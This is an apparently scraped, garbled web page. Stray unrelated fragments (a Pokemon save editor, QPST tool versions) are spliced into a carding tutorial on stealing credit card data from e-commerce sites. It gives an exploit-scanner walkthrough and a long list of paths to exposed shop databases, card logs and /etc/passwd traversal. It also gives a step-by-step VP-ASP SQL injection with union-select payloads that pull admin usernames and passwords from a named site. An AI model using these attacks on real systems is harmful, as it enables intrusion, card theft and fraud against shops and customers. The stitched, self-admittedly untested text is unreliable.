Menu
Pokemon save editor for mac. VP-ASP Shopadmin Hack This is a pretty common hack and is very easy. In my first post for this blog, you’ll learn how to hack the ever-so-vulnerable VP-ASP shop and gain access to a list of credit card numbers, addresses and other details customers have entered.
As covered on the main site all information presented within this guide is for- Most of the SQL Injections attack can be done on SQL database in lots of many ASP websites. Steps to hack a website in 2019 using SQL Injection: Browse Google and insert “admin/login.asp” in the search engine. Use the option to search in our own country.
- Qpst Tool Versi 2.7.399; Bbm Versi 2 7 0 21; To check for the latest version, go here. QPST Tool v2.7.447 can smoothly run on Windows XP, Windows 7, Windows Vista, Windows 8, Windows 8.1 and Windows 10.
information purposes only. any attempt to use the information within this guide
to commit anything illegal is solely the responsibility of the reader, and
neither i, information leak, nor anyone else affiliated is responsible for
what you do with the following information.
Section 1: the introduction
----------------------------
Originally i was working on a security scanner for ecommerce sites, but since i'm
about to get back into school and won't have as much time as before to really
work on many projects i decided it'd be better to just go ahead and write a
tutorial on the subject. so for this tutorial we will talk about one way a carder
would collect ccs to cash/use/sell/whatever, and that of course is exploiting
ecommerce sites. there are millions of sites out there used by businesses large
and small for peddling their services/merchandise, and needless to say there are
plenty of them out there that are easily exploited. so here it is, the answer to
every 'how to hack cc' question out there. enjoy..
Section 2: database vulnerabilities
------------------------------------
One of the most common and easiest ways to exploit ecommerce sites is to use
database vulnerabilities. these are present due to insecure database software
that many ecommerce sites will use for recording and tracking online purchases.
one method that an attacker could use to find such database vulnerabilities on
a specific site is to use an exploiter. exploiters are software that will use
an exploit list to scan for exploits on a target web server, and report back
any positive responses. cmxploiter iv (content is disable for unregistered
register here)
is an example of an exploiter, though there are others that you can look for to
use as well. the interface for cmxploiter iv is pretty self-explanatory, but i'll
run you through the basics anyway. to use this tool you would first click 'load',
which will bring up three different tabs. you would click 'exploit lists' to
select an exploit list to use, 'proxy list' is to of course select a list of
proxies to use, and 'url list' is to select a list of targets to scan. then from
there you would go to options. the first menu to pop up is the current session
options. edit the responses to include in session history so that only the
'200 series responses' (positive responses) are included in the results, and from
here you can also edit the 'socket timeout value' based on your internet connection
(leave as is for faster internet connections, set to 40 for slower internet
connections). then go to proxy list selection options and either put in the proxy
you are going to use for the scan, or click 'multi-proxy mode' to tell cmxploiter iv
to use the proxy list you loaded. now that you have everything configured go
to start and select the type of scan you want to do. 'single url scan' is used to
scan a single server with the exploit list provided, 'multi-url scan' is used to
scan every site in the url list for every exploit in the exploit list, and
'single exploit scan' is used to scan every site in the url list for a single
exploit. on a last note with any exploiter you use if the option is available
be sute to set it to use get requests instead of head requests for the scan.
i've found that you get much more accurate results that way. now that i've
covered all the configurations i'm going to provide an exploit list that you
could use for scanning database vulnerabilities..
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$
/+comersus/database/comersus.mdb
/+comersus/store/comersus.mdb
/././cart32.mdb
//comersus.mdb
//comersus/comersus.mdb
//comersus/database/comersus.mdb
//database/comersus.mdb
//shop/
//shop/?m=a
//store/
//store/?m=a
//store/comersus.mdb
//store/comersus/comersus.mdb
//store/comersus/database/comersus.mdb
//store/database/comersus.mdb
To Hack Shopadmin Asp Password
/asp/cart/
/asp/cart/database/
/asp/cart/database/metacart.mdb
/bin/cart.pl
/bin/cartmanager.cgi
![Shopdbtest.asp Shopdbtest.asp](https://4.bp.blogspot.com/-6JcKnB2CXYE/VCAWefJ5HqI/AAAAAAAAA_U/uJ5RNdDtV2c/s1600/5.png)
/cgi-bin/cart.pl
/cgi-bin/cartmanager.cgi
/cgi/cartmanager.cgi
To Hack Shopadmin Aspirin
/cybercash/smps*../merchants/admin.pw
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dcshop/dcshop_admin.cgi
/dcshop/orders/orders.txt
/midicart/midicart.mdb
/merchant2/
/merchant2/install.txt
/merchant2/admin.mv
/merchant2/database/
/merchant2/modules/
/orders
/orders/
/orders/
/orders/order.log
/orders/order_log.dat
/orders/order_log_v12.dat
/orders/orders.txt
/oscommerce/catalog/
/oscommerce/catalog/admin/
/oscommerce/catalog/admin/orders.php
/osecommerce/
/osecommerce/admin/
/osecommerce/admin/admin/
/osecommerce/admin/admin/includes/
/osecommerce/admin/admin/includes/functions/
/osecommerce/admin/admin/includes/functions/databa se.php
/pdg/cvv2.txt
/pdg/order.txt
/pdg_cart
/pdg_cart/
/pdg_cart/authorizenet.txt
/pdg_cart/authorizenets.txt
/pdg_cart/cc.txt
/pdg_cart/oder.log
/pdg_cart/order.log
/pdg_cart/shopper.conf
/pdg_cart/shopper.config
/ptsc/db/ptsc.mdb
/procuctcart/pc/pcadmin/
/prodctcart/pcadmin/
/productcart/database/eipc.mdb
/productcart/pc/admin
/sales_files/
/shop/shop.sql
/shop/info.dat
/shop/orders.in
/shop/track.db
/shopcart2.mdb
/shoppingcart/cart.jsp
/shoppingcart/orders.inc
/siteserver/admin/
/siteserver/admin/commerce/foundation/dsn.asp
/siteserver/admin/commerce/foundation/domain.asp
/siteserver/admin/commerce/foundation/driver.asp
/siteserver/admin/knowledge/dsmgr/default.asp
/siteserver/admin/knowledge/dsmgr/users/groupmanag er.asp
/siteserver/admin/knowledge/dsmgr/users/usermanage r.asp
/siteserver/admin/knowledge/persmbr/vslslprd.asp
/siteserver/admin/knowledge/persmbr/vsprauoed.asp
/siteserver/admin/knowledge/persmbr/vstmpr.asp
/siteserver/admin/knowledge/persmbr/vs.asp
/siteserver/knowledge/default.asp?ctr='>
/siteserver/publishing/
/siteserver/publishing/viewcode.asp
/siteserver/publishing/viewcode.asp
/siteserver/admin/
/siteserver/admin/findvserver.asp
/siteserver/admin/findvserver.asp?uid=ldap_anonymo us&pwd=ldappassword_1
/store/admin/default.asp
/store/orders.inc
/storeadmin
/storeadmin/
/storedb
/storedb/
/webshop
/webshop/
/webshop/logs/
/webshop/logs/cc.txt
/webshop/logs/ck.log
/webshop/templates/cc.txt
/web_store
/web_store/web_store.cgi?page=./././././././ ./././etc/passwd.html
/web_store
/web_store/
/web_store/admin_files/
/web_store/web_store.cgi?page=./././././././ ./etc/passw
/webshop*
/webshop/
/webshop/*
/webstore/
/_database/shopping400.mdb
/_private/shopping_cart.mdb
/_vti_cnf/order.log
/_vti_cnf/order.txt
/acart.mdb
/acart2.mdb
/acart20.mdb
/acart2_0.mdb
/acart2_0/acart2_0.mdb
/acart2_0/admin/category.asp /acart2_0/admin/error.asp?msg=
/acart2_0/admin/index.asp?msg=
/acart2_0/deliver.asp?msg=
inurl:/shopdisplayproducts.asp
now we'll find some site with shopdisplayproducts.asp
Let's see some site
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
2)Ok … now we put on end of link this sign ‘
3)Now the link will look like this
http://www.globalasp.org.uk/store/shopdisp….asp?id=14′
and we get an error
error look like this
products
microsoft jet database engine error ‘80040e14′
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14′ and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!
4)ok … now we removed ‘
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
link now is
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!
5)ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> this you see 47 is the end number
ok now we put this in browser and don’t see error we see some laptops
ok … now we find on that site numbers 3 and 4
they are small
when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
now explotable link is this
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
there is login for shopadmin and we login !!!
this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
![To hack shopadmin asphalt 8 To hack shopadmin asphalt 8](https://unleashedyourskills.files.wordpress.com/2017/01/rfd.jpg?w=700)
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
WARNING
i have not tested it it has been taken from some other site so i m not sure it will work or not